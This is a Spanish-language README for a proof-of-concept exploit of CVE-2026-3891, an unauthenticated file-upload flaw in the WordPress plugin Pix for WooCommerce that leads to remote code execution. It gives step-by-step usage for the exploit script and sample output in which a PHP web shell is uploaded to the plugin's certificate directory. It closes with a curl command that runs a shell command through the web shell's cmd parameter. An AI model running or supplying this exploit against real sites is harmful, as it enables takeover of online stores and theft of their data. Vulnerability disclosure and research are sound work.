
PoC para CVE-2026-3891 — Carga arbitraria de archivos no autenticada que conduce a ejecución remota de código en Pix for WooCommerce <= 1.5.0
CVE-2026-3891 es una vulnerabilidad crítica de Subida Arbitraria de Archivos no Autenticada encontrada en el plugin de WordPress Pix for WooCommerce en versiones hasta la 1.5.0 inclusive.
La vulnerabilidad existe en la funcionalidad lkn_pix_for_woocommerce_c6_save_settings debido a la falta de controles de autorización y a una validación insuficiente del tipo de archivo. El exploit automatiza el proceso de obtención de un nonce válido y demuestra la subida sin restricciones de un archivo PHP a un directorio accesible desde la web.
Aprovechando esta vulnerabilidad, un atacante no autenticado podría ser capaz de:
pip install requests
CVE-2026-3891.py en tu sistema.python CVE-2026-3891.py
Introduce la URL de WordPress de destino cuando se te solicite:
[?] Enter target URL: http://localhost/wordpress
Ejemplo:
[*] Requesting nonce...
[+] Nonce obtained: **********
[*] Uploading woocommerce.php...
[+] File uploaded successfully!
[+] URL: http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php
curl http://target/wp-content/plugins/payment-gateway-pix-for-woocommerce/Includes/files/certs_c6/woocommerce.php?cmd=ls
